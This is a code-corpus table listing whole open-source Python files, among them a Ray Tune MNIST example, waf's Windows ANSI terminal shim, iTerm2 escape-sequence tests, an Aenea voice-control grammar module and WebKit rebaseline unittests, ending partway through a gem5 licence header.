repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
ujvl/ray-ng | python/ray/tune/examples/mnist_pytorch.py | 1 | 4582 | # Original Code here:
# https://github.com/pytorch/examples/blob/master/mnist/main.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import argparse
from filelock import FileLock
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import ray
from ray import tune
from ray.tune import track
from ray.tune.schedulers import AsyncHyperBandScheduler
# Change these values if you want the training to run quicker or slower.
EPOCH_SIZE = 512
TEST_SIZE = 256
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.conv1 = nn.Conv2d(1, 3, kernel_size=3)
self.fc = nn.Linear(192, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 3))
x = x.view(-1, 192)
x = self.fc(x)
return F.log_softmax(x, dim=1)
def train(model, optimizer, train_loader, device=torch.device("cpu")):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if batch_idx * len(data) > EPOCH_SIZE:
return
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
def test(model, data_loader, device=torch.device("cpu")):
model.eval()
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(data_loader):
if batch_idx * len(data) > TEST_SIZE:
break
data, target = data.to(device), target.to(device)
outputs = model(data)
_, predicted = torch.max(outputs.data, 1)
total += target.size(0)
correct += (predicted == target).sum().item()
return correct / total
def get_data_loaders():
mnist_transforms = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))])
# We add FileLock here because multiple workers will want to
# download data, and this may cause overwrites since
# DataLoader is not threadsafe.
with FileLock(os.path.expanduser("~/data.lock")):
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
"~/data",
train=True,
download=True,
transform=mnist_transforms),
batch_size=64,
shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST("~/data", train=False, transform=mnist_transforms),
batch_size=64,
shuffle=True)
return train_loader, test_loader
def train_mnist(config):
use_cuda = config.get("use_gpu") and torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
train_loader, test_loader = get_data_loaders()
model = ConvNet().to(device)
optimizer = optim.SGD(
model.parameters(), lr=config["lr"], momentum=config["momentum"])
while True:
train(model, optimizer, train_loader, device)
acc = test(model, test_loader, device)
track.log(mean_accuracy=acc)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PyTorch MNIST Example")
parser.add_argument(
"--cuda",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--ray-address",
help="Address of Ray cluster for seamless distributed execution.")
args = parser.parse_args()
if args.ray_address:
ray.init(address=args.ray_address)
sched = AsyncHyperBandScheduler(
time_attr="training_iteration", metric="mean_accuracy")
analysis = tune.run(
train_mnist,
name="exp",
scheduler=sched,
stop={
"mean_accuracy": 0.98,
"training_iteration": 5 if args.smoke_test else 100
},
resources_per_trial={
"cpu": 2,
"gpu": int(args.cuda)
},
num_samples=1 if args.smoke_test else 50,
config={
"lr": tune.sample_from(lambda spec: 10**(-10 * np.random.rand())),
"momentum": tune.uniform(0.1, 0.9),
"use_gpu": int(args.cuda)
})
print("Best config is:", analysis.get_best_config(metric="mean_accuracy"))
| apache-2.0 |
rdkit/rdkit-orig | rdkit/utils/REFile.py | 2 | 2195 | #
# Copyright (C) 2000 greg Landrum
#
""" contains class REFile, for working with files containing comments
"""
import re
class REFile:
"""behaves more or less like a normal file, but removes comments
Any read from the file skips lines beginning with a comment character
and cleaves off any portion of the line following a comment character
"""
def close(self):
""" closes the file
"""
self.inFile.close()
def rewind(self):
""" rewinds the file (seeks to the beginning)
"""
self.inFile.seek(0)
def readlines(self):
""" reads in all the lines of the file
"""
res = []
eofHit = 0
while not eofHit:
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
eofHit = 0
while len(l) == 0 and not eofHit:
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
if not eofHit:
res.append(l)
return res
def readline(self):
""" reads in a single line from the file
"""
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
eofHit = 0
while len(l) == 0 and not eofHit:
l = self.inFile.readline()
if l == '':
eofHit = 1
else:
l = self.expr.split(l)[0]
return l
def __init__(self,fileName,mode='r',commentChar='#|\n'):
""" Constructor
**Arguments**
- fileName: the filename from which to read
- mode: the mode in which to open the file
- commentChar: a regexp defining the comment character
"""
self.expr = re.compile(commentChar)
self.fileName = fileName
self.mode = mode
self.inFile = open(fileName,mode)
if __name__ == '__main__':
fName = 'retest.txt'
ref = REFile(fName)
lines = ref.readlines()
print 'readlines:'
for i in xrange(len(lines)):
print '\t%d: %s'%(i,lines[i])
ref.rewind()
print 'readline:'
inStr = ref.readline()
nRead = 0
while inStr != '':
print '\t%d: %s'%(nRead,inStr)
nRead=nRead+1
inStr = ref.readline()
| bsd-3-clause |
0-wiz-0/audacity | lib-src/lv2/lv2/plugins/eg-amp.lv2/waflib/ansiterm.py | 177 | 8189 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import sys,os
try:
if not(sys.stderr.isatty()and sys.stdout.isatty()):
raise ValueError('not a tty')
from ctypes import Structure,windll,c_short,c_ushort,c_ulong,c_int,byref,POINTER,c_long,c_wchar
class COORD(Structure):
_fields_=[("X",c_short),("Y",c_short)]
class SMALL_RECT(Structure):
_fields_=[("Left",c_short),("Top",c_short),("Right",c_short),("Bottom",c_short)]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_=[("Size",COORD),("CursorPosition",COORD),("Attributes",c_short),("Window",SMALL_RECT),("MaximumWindowSize",COORD)]
class CONSOLE_CURSOR_INFO(Structure):
_fields_=[('dwSize',c_ulong),('bVisible',c_int)]
windll.kernel32.GetStdHandle.argtypes=[c_ulong]
windll.kernel32.GetStdHandle.restype=c_ulong
windll.kernel32.GetConsoleScreenBufferInfo.argtypes=[c_ulong,POINTER(CONSOLE_SCREEN_BUFFER_INFO)]
windll.kernel32.GetConsoleScreenBufferInfo.restype=c_long
windll.kernel32.SetConsoleTextAttribute.argtypes=[c_ulong,c_ushort]
windll.kernel32.SetConsoleTextAttribute.restype=c_long
windll.kernel32.FillConsoleOutputCharacterW.argtypes=[c_ulong,c_wchar,c_ulong,POINTER(COORD),POINTER(c_ulong)]
windll.kernel32.FillConsoleOutputCharacterW.restype=c_long
windll.kernel32.FillConsoleOutputAttribute.argtypes=[c_ulong,c_ushort,c_ulong,POINTER(COORD),POINTER(c_ulong)]
windll.kernel32.FillConsoleOutputAttribute.restype=c_long
windll.kernel32.SetConsoleCursorPosition.argtypes=[c_ulong,POINTER(COORD)]
windll.kernel32.SetConsoleCursorPosition.restype=c_long
windll.kernel32.SetConsoleCursorInfo.argtypes=[c_ulong,POINTER(CONSOLE_CURSOR_INFO)]
windll.kernel32.SetConsoleCursorInfo.restype=c_long
sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
csinfo=CONSOLE_CURSOR_INFO()
hconsole=windll.kernel32.GetStdHandle(-11)
windll.kernel32.GetConsoleScreenBufferInfo(hconsole,byref(sbinfo))
if sbinfo.Size.X<9 or sbinfo.Size.Y<9:raise ValueError('small console')
windll.kernel32.GetConsoleCursorInfo(hconsole,byref(csinfo))
except Exception:
pass
else:
import re,threading
is_vista=getattr(sys,"getwindowsversion",None)and sys.getwindowsversion()[0]>=6
try:
_type=unicode
except NameError:
_type=str
to_int=lambda number,default:number and int(number)or default
wlock=threading.Lock()
STD_OUTPUT_HANDLE=-11
STD_ERROR_HANDLE=-12
class AnsiTerm(object):
def __init__(self):
self.encoding=sys.stdout.encoding
self.hconsole=windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
self.cursor_history=[]
self.orig_sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
self.orig_csinfo=CONSOLE_CURSOR_INFO()
windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole,byref(self.orig_sbinfo))
windll.kernel32.GetConsoleCursorInfo(hconsole,byref(self.orig_csinfo))
def screen_buffer_info(self):
sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole,byref(sbinfo))
return sbinfo
def clear_line(self,param):
mode=param and int(param)or 0
sbinfo=self.screen_buffer_info()
if mode==1:
line_start=COORD(0,sbinfo.CursorPosition.Y)
line_length=sbinfo.Size.X
elif mode==2:
line_start=COORD(sbinfo.CursorPosition.X,sbinfo.CursorPosition.Y)
line_length=sbinfo.Size.X-sbinfo.CursorPosition.X
else:
line_start=sbinfo.CursorPosition
line_length=sbinfo.Size.X-sbinfo.CursorPosition.X
chars_written=c_ulong()
windll.kernel32.FillConsoleOutputCharacterW(self.hconsole,c_wchar(' '),line_length,line_start,byref(chars_written))
windll.kernel32.FillConsoleOutputAttribute(self.hconsole,sbinfo.Attributes,line_length,line_start,byref(chars_written))
def clear_screen(self,param):
mode=to_int(param,0)
sbinfo=self.screen_buffer_info()
if mode==1:
clear_start=COORD(0,0)
clear_length=sbinfo.CursorPosition.X*sbinfo.CursorPosition.Y
elif mode==2:
clear_start=COORD(0,0)
clear_length=sbinfo.Size.X*sbinfo.Size.Y
windll.kernel32.SetConsoleCursorPosition(self.hconsole,clear_start)
else:
clear_start=sbinfo.CursorPosition
clear_length=((sbinfo.Size.X-sbinfo.CursorPosition.X)+sbinfo.Size.X*(sbinfo.Size.Y-sbinfo.CursorPosition.Y))
chars_written=c_ulong()
windll.kernel32.FillConsoleOutputCharacterW(self.hconsole,c_wchar(' '),clear_length,clear_start,byref(chars_written))
windll.kernel32.FillConsoleOutputAttribute(self.hconsole,sbinfo.Attributes,clear_length,clear_start,byref(chars_written))
def push_cursor(self,param):
sbinfo=self.screen_buffer_info()
self.cursor_history.append(sbinfo.CursorPosition)
def pop_cursor(self,param):
if self.cursor_history:
old_pos=self.cursor_history.pop()
windll.kernel32.SetConsoleCursorPosition(self.hconsole,old_pos)
def set_cursor(self,param):
y,sep,x=param.partition(';')
x=to_int(x,1)-1
y=to_int(y,1)-1
sbinfo=self.screen_buffer_info()
new_pos=COORD(min(max(0,x),sbinfo.Size.X),min(max(0,y),sbinfo.Size.Y))
windll.kernel32.SetConsoleCursorPosition(self.hconsole,new_pos)
def set_column(self,param):
x=to_int(param,1)-1
sbinfo=self.screen_buffer_info()
new_pos=COORD(min(max(0,x),sbinfo.Size.X),sbinfo.CursorPosition.Y)
windll.kernel32.SetConsoleCursorPosition(self.hconsole,new_pos)
def move_cursor(self,x_offset=0,y_offset=0):
sbinfo=self.screen_buffer_info()
new_pos=COORD(min(max(0,sbinfo.CursorPosition.X+x_offset),sbinfo.Size.X),min(max(0,sbinfo.CursorPosition.Y+y_offset),sbinfo.Size.Y))
windll.kernel32.SetConsoleCursorPosition(self.hconsole,new_pos)
def move_up(self,param):
self.move_cursor(y_offset=-to_int(param,1))
def move_down(self,param):
self.move_cursor(y_offset=to_int(param,1))
def move_left(self,param):
self.move_cursor(x_offset=-to_int(param,1))
def move_right(self,param):
self.move_cursor(x_offset=to_int(param,1))
def next_line(self,param):
sbinfo=self.screen_buffer_info()
self.move_cursor(x_offset=-sbinfo.CursorPosition.X,y_offset=to_int(param,1))
def prev_line(self,param):
sbinfo=self.screen_buffer_info()
self.move_cursor(x_offset=-sbinfo.CursorPosition.X,y_offset=-to_int(param,1))
def rgb2bgr(self,c):
return((c&1)<<2)|(c&2)|((c&4)>>2)
def set_color(self,param):
cols=param.split(';')
sbinfo=CONSOLE_SCREEN_BUFFER_INFO()
windll.kernel32.GetConsoleScreenBufferInfo(self.hconsole,byref(sbinfo))
attr=sbinfo.Attributes
for c in cols:
if is_vista:
c=int(c)
else:
c=to_int(c,0)
if 29<c<38:
attr=(attr&0xfff0)|self.rgb2bgr(c-30)
elif 39<c<48:
attr=(attr&0xff0f)|(self.rgb2bgr(c-40)<<4)
elif c==0:
attr=self.orig_sbinfo.Attributes
elif c==1:
attr|=0x08
elif c==4:
attr|=0x80
elif c==7:
attr=(attr&0xff88)|((attr&0x70)>>4)|((attr&0x07)<<4)
windll.kernel32.SetConsoleTextAttribute(self.hconsole,attr)
def show_cursor(self,param):
csinfo.bVisible=1
windll.kernel32.SetConsoleCursorInfo(self.hconsole,byref(csinfo))
def hide_cursor(self,param):
csinfo.bVisible=0
windll.kernel32.SetConsoleCursorInfo(self.hconsole,byref(csinfo))
ansi_command_table={'A':move_up,'B':move_down,'C':move_right,'D':move_left,'E':next_line,'F':prev_line,'G':set_column,'H':set_cursor,'f':set_cursor,'J':clear_screen,'K':clear_line,'h':show_cursor,'l':hide_cursor,'m':set_color,'s':push_cursor,'u':pop_cursor,}
ansi_tokens=re.compile('(?:\x1b\[([0-9?;]*)([a-zA-Z])|([^\x1b]+))')
def write(self,text):
try:
wlock.acquire()
for param,cmd,txt in self.ansi_tokens.findall(text):
if cmd:
cmd_func=self.ansi_command_table.get(cmd)
if cmd_func:
cmd_func(self,param)
else:
self.writeconsole(txt)
finally:
wlock.release()
def writeconsole(self,txt):
chars_written=c_int()
writeconsole=windll.kernel32.WriteConsoleA
if isinstance(txt,_type):
writeconsole=windll.kernel32.WriteConsoleW
TINY_STEP=3000
for x in range(0,len(txt),TINY_STEP):
tiny=txt[x:x+TINY_STEP]
writeconsole(self.hconsole,tiny,len(tiny),byref(chars_written),None)
def flush(self):
pass
def isatty(self):
return True
sys.stderr=sys.stdout=AnsiTerm()
os.environ['TERM']='vt100'
| gpl-2.0 |
splodingsocks/iTerm2 | tests/esctest/tests/ris.py | 28 | 2812 | from esc import ESC, NUL, TAB
import esccmd
import escio
import esclog
from escutil import AssertEQ, AssertScreenCharsInRectEqual, AssertTrue, GetCursorPosition, GetScreenSize, GetIconTitle, GetWindowTitle, knownBug, vtLevel
from esctypes import InternalError, Point, Rect
class RISTests(object):
def test_RIS_ClearsScreen(self):
escio.Write("x")
esccmd.RIS()
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ NUL ])
def test_RIS_CursorToOrigin(self):
esccmd.CUP(Point(5, 6))
esccmd.RIS()
AssertEQ(GetCursorPosition(), Point(1, 1))
def test_RIS_ResetTabs(self):
esccmd.HTS()
esccmd.CUF()
esccmd.HTS()
esccmd.CUF()
esccmd.HTS()
esccmd.RIS()
escio.Write(TAB)
AssertEQ(GetCursorPosition(), Point(9, 1))
@knownBug(terminal="iTerm2", reason="RM_Title and SM_Title not implemented.")
def test_RIS_ResetTitleMode(self):
esccmd.RM_Title(esccmd.SET_UTF8, esccmd.QUERY_UTF8)
esccmd.SM_Title(esccmd.SET_HEX, esccmd.QUERY_HEX)
esccmd.RIS()
esccmd.ChangeWindowTitle("ab")
AssertEQ(GetWindowTitle(), "ab")
esccmd.ChangeWindowTitle("a")
AssertEQ(GetWindowTitle(), "a")
esccmd.ChangeIconTitle("ab")
AssertEQ(GetIconTitle(), "ab")
esccmd.ChangeIconTitle("a")
AssertEQ(GetIconTitle(), "a")
@knownBug(terminal="iTerm2", reason="iTerm2 doesn't support ALTBUF.")
def test_RIS_ExitAltScreen(self):
escio.Write("m")
esccmd.DECSET(esccmd.ALTBUF)
esccmd.CUP(Point(1, 1))
escio.Write("a")
esccmd.RIS()
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ NUL ])
esccmd.DECSET(esccmd.ALTBUF)
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ "a" ])
@knownBug(terminal="xterm",
reason="xterm seems to check initflags rather than flags in ReallyReset() (bug reported)")
def test_RIS_ResetDECCOLM(self):
esccmd.DECSET(esccmd.Allow80To132)
esccmd.DECSET(esccmd.DECCOLM)
AssertEQ(GetScreenSize().width(), 132)
esccmd.RIS()
AssertEQ(GetScreenSize().width(), 80)
def test_RIS_ResetDECOM(self):
esccmd.DECSTBM(5, 7)
esccmd.DECSET(esccmd.DECLRMM)
esccmd.DECSLRM(5, 7)
esccmd.DECSET(esccmd.DECOM)
esccmd.RIS()
esccmd.CUP(Point(1, 1))
escio.Write("X")
esccmd.DECRESET(esccmd.DECLRMM)
esccmd.DECSTBM()
AssertScreenCharsInRectEqual(Rect(1, 1, 1, 1), [ "X" ])
def test_RIS_RemoveMargins(self):
esccmd.DECSET(esccmd.DECLRMM)
esccmd.DECSLRM(3, 5)
esccmd.DECSTBM(4, 6)
esccmd.RIS()
esccmd.CUP(Point(3, 4))
esccmd.CUB()
AssertEQ(GetCursorPosition(), Point(2, 4))
esccmd.CUU()
AssertEQ(GetCursorPosition(), Point(2, 3))
esccmd.CUP(Point(5, 6))
esccmd.CUF()
AssertEQ(GetCursorPosition(), Point(6, 6))
esccmd.CUD()
AssertEQ(GetCursorPosition(), Point(6, 7))
| gpl-2.0 |
djr7C4/aenea | client/_aenea.py | 6 | 5546 | # This is a command module for Dragonfly. It provides support for several of
# Aenea's built-in capabilities. This module is NOT required for Aenea to
# work correctly, but it is strongly recommended.
# This file is part of Aenea
#
# Aenea is free software: you can redistribute it and/or modify it under
# the terms of version 3 of the GNU Lesser General Public License as
# published by the Free Software Foundation.
#
# Aenea is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Aenea. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright (2014) Alex Roper
# Alex Roper <[email protected]>
import os
import sys
import dragonfly
# Internal NatLink module for reloading grammars.
import natlinkmain
try:
import aenea
import aenea.proxy_contexts
import aenea.configuration
import aenea.communications
import aenea.config
import aenea.configuration
except ImportError:
print 'Unable to import Aenea client-side modules.'
raise
print 'Aenea client-side modules loaded successfully'
print 'Settings:'
print '\tHOST:', aenea.config.DEFAULT_SERVER_ADDRESS[0]
print '\tPORT:', aenea.config.DEFAULT_SERVER_ADDRESS[1]
print '\tPLATFORM:', aenea.config.PLATFORM
print '\tUSE_MULTIPLE_ACTIONS:', aenea.config.USE_MULTIPLE_ACTIONS
print '\tSCREEN_RESOLUTION:', aenea.config.SCREEN_RESOLUTION
try:
aenea.proxy_contexts._get_context()
print 'Aenea: Successfully connected to server.'
except:
print 'Aenea: Unable to connect to server.'
# Commands that can be rebound.
command_table = [
'set proxy server to <proxy>',
'disable proxy server',
'enable proxy server',
'force natlink to reload all grammars'
]
command_table = aenea.configuration.make_grammar_commands(
'aenea',
dict(zip(command_table, command_table))
)
def topy(path):
if path.endswith == ".pyc":
return path[:-1]
return path
class DisableRule(dragonfly.CompoundRule):
spec = command_table['disable proxy server']
def _process_recognition(self, node, extras):
aenea.config.disable_proxy()
class EnableRule(dragonfly.CompoundRule):
spec = command_table['enable proxy server']
def _process_recognition(self, node, extras):
aenea.config.enable_proxy()
def reload_code():
# Do not reload anything in these directories or their subdirectories.
dir_reload_blacklist = set(["core"])
macro_dir = "C:\\NatLink\\NatLink\\MacroSystem"
# Unload all grammars.
natlinkmain.unloadEverything()
# Unload all modules in macro_dir except for those in directories on the
# blacklist.
# Consider them in sorted order to try to make things as predictable as possible to ease debugging.
for name, module in sorted(sys.modules.items()):
if module and hasattr(module, "__file__"):
# Some builtin modules only have a name so module is None or
# do not have a __file__ attribute. We skip these.
path = module.__file__
# Convert .pyc paths to .py paths.
path = topy(path)
# Do not unimport this module! This will cause major problems!
if (path.startswith(macro_dir) and
not bool(set(path.split(os.path.sep)) & dir_reload_blacklist)
and path != topy(os.path.abspath(__file__))):
print "removing %s from cache" % name
# Remove the module from the cache so that it will be reloaded
# the next time # that it is imported. The paths for packages
# end with __init__.pyc so this # takes care of them as well.
del sys.modules[name]
try:
# Reload the top-level modules in macro_dir.
natlinkmain.findAndLoadFiles()
except Exception as e:
print "reloading failed: {}".format(e)
else:
print "finished reloading"
# Note that you do not need to turn mic off and then on after saying this. This
# also unloads all modules and packages in the macro directory so that they will
# be reloaded the next time that they are imported. It even reloads Aenea!
class ReloadGrammarsRule(dragonfly.MappingRule):
mapping = {command_table['force natlink to reload all grammars']: dragonfly.Function(reload_code)}
server_list = dragonfly.DictList('aenea servers')
server_list_watcher = aenea.configuration.ConfigWatcher(
('grammar_config', 'aenea'))
class ChangeServer(dragonfly.CompoundRule):
spec = command_table['set proxy server to <proxy>']
extras = [dragonfly.DictListRef('proxy', server_list)]
def _process_recognition(self, node, extras):
aenea.communications.set_server_address((extras['proxy']['host'], extras['proxy']['port']))
def _process_begin(self):
if server_list_watcher.refresh():
server_list.clear()
for k, v in server_list_watcher.conf.get('servers', {}).iteritems():
server_list[str(k)] = v
grammar = dragonfly.Grammar('aenea')
grammar.add_rule(EnableRule())
grammar.add_rule(DisableRule())
grammar.add_rule(ReloadGrammarsRule())
grammar.add_rule(ChangeServer())
grammar.load()
# Unload function which will be called at unload time.
def unload():
global grammar
if grammar:
grammar.unload()
grammar = None
| lgpl-3.0 |
sloanyang/android_external_webkit | Tools/Scripts/webkitpy/tool/commands/rebaselineserver_unittest.py | 15 | 11435 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.system import filesystem_mock
from webkitpy.layout_tests.port import base
from webkitpy.layout_tests.port.webkit import WebKitPort
from webkitpy.tool.commands import rebaselineserver
from webkitpy.tool.mocktool import MockSCM
class RebaselineTestTest(unittest.TestCase):
def test_text_rebaseline_update(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='none',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_new(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='none',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move_no_op_1(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/win/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move_no_op_2(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.checksum',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Moving current mac baselines to mac-leopard',
' No current baselines to move',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/text...',
' Moving current mac baselines to mac-leopard',
' Moved text-expected.txt',
' Updating baselines for mac',
' Updated text-expected.txt',
])
def test_text_rebaseline_move_only_images(self):
self._assertRebaseline(
test_files=(
'fast/image-expected.txt',
'platform/mac/fast/image-expected.txt',
'platform/mac/fast/image-expected.png',
'platform/mac/fast/image-expected.checksum',
),
results_files=(
'fast/image-actual.png',
'fast/image-actual.checksum',
),
test_name='fast/image.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=True,
expected_log=[
'Rebaselining fast/image...',
' Moving current mac baselines to mac-leopard',
' Moved image-expected.checksum',
' Moved image-expected.png',
' Updating baselines for mac',
' Updated image-expected.checksum',
' Updated image-expected.png',
])
def test_text_rebaseline_move_already_exist(self):
self._assertRebaseline(
test_files=(
'fast/text-expected.txt',
'platform/mac-leopard/fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
results_files=(
'fast/text-actual.txt',
),
test_name='fast/text.html',
baseline_target='mac',
baseline_move_to='mac-leopard',
expected_success=False,
expected_log=[
'Rebaselining fast/text...',
' Moving current mac baselines to mac-leopard',
' Already had baselines in mac-leopard, could not move existing mac ones',
])
def test_image_rebaseline(self):
self._assertRebaseline(
test_files=(
'fast/image-expected.txt',
'platform/mac/fast/image-expected.png',
'platform/mac/fast/image-expected.checksum',
),
results_files=(
'fast/image-actual.png',
'fast/image-actual.checksum',
),
test_name='fast/image.html',
baseline_target='mac',
baseline_move_to='none',
expected_success=True,
expected_log=[
'Rebaselining fast/image...',
' Updating baselines for mac',
' Updated image-expected.checksum',
' Updated image-expected.png',
])
def _assertRebaseline(self, test_files, results_files, test_name, baseline_target, baseline_move_to, expected_success, expected_log):
log = []
test_config = get_test_config(test_files, results_files)
success = rebaselineserver._rebaseline_test(
test_name,
baseline_target,
baseline_move_to,
test_config,
log=lambda l: log.append(l))
self.assertEqual(expected_log, log)
self.assertEqual(expected_success, success)
class GetActualResultFilesTest(unittest.TestCase):
def test(self):
test_config = get_test_config(result_files=(
'fast/text-actual.txt',
'fast2/text-actual.txt',
'fast/text2-actual.txt',
'fast/text-notactual.txt',
))
self.assertEqual(
('text-actual.txt',),
rebaselineserver._get_actual_result_files(
'fast/text.html', test_config))
class GetBaselinesTest(unittest.TestCase):
def test_no_baselines(self):
self._assertBaselines(
test_files=(),
test_name='fast/missing.html',
expected_baselines={})
def test_text_baselines(self):
self._assertBaselines(
test_files=(
'fast/text-expected.txt',
'platform/mac/fast/text-expected.txt',
),
test_name='fast/text.html',
expected_baselines={
'mac': {'.txt': True},
'base': {'.txt': False},
})
def test_image_and_text_baselines(self):
self._assertBaselines(
test_files=(
'fast/image-expected.txt',
'platform/mac/fast/image-expected.png',
'platform/mac/fast/image-expected.checksum',
'platform/win/fast/image-expected.png',
'platform/win/fast/image-expected.checksum',
),
test_name='fast/image.html',
expected_baselines={
'base': {'.txt': True},
'mac': {'.checksum': True, '.png': True},
'win': {'.checksum': False, '.png': False},
})
def test_extra_baselines(self):
self._assertBaselines(
test_files=(
'fast/text-expected.txt',
'platform/nosuchplatform/fast/text-expected.txt',
),
test_name='fast/text.html',
expected_baselines={'base': {'.txt': True}})
def _assertBaselines(self, test_files, test_name, expected_baselines):
actual_baselines = rebaselineserver._get_test_baselines(
test_name, get_test_config(test_files))
self.assertEqual(expected_baselines, actual_baselines)
def get_test_config(test_files=[], result_files=[]):
layout_tests_directory = base.Port().layout_tests_dir()
results_directory = '/WebKitBuild/Debug/layout-test-results'
mock_filesystem = filesystem_mock.MockFileSystem()
for file in test_files:
file_path = mock_filesystem.join(layout_tests_directory, file)
mock_filesystem.files[file_path] = ''
for file in result_files:
file_path = mock_filesystem.join(results_directory, file)
mock_filesystem.files[file_path] = ''
class TestMacPort(WebKitPort):
def __init__(self):
WebKitPort.__init__(self, filesystem=mock_filesystem)
self._name = 'mac'
return rebaselineserver.TestConfig(
TestMacPort(),
layout_tests_directory,
results_directory,
('mac', 'mac-leopard', 'win', 'linux'),
mock_filesystem,
MockSCM())
| gpl-2.0 |
LingxiaoJIA/gem5 | src/cpu/o3/FUPool.py | 69 | 2002 | # Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
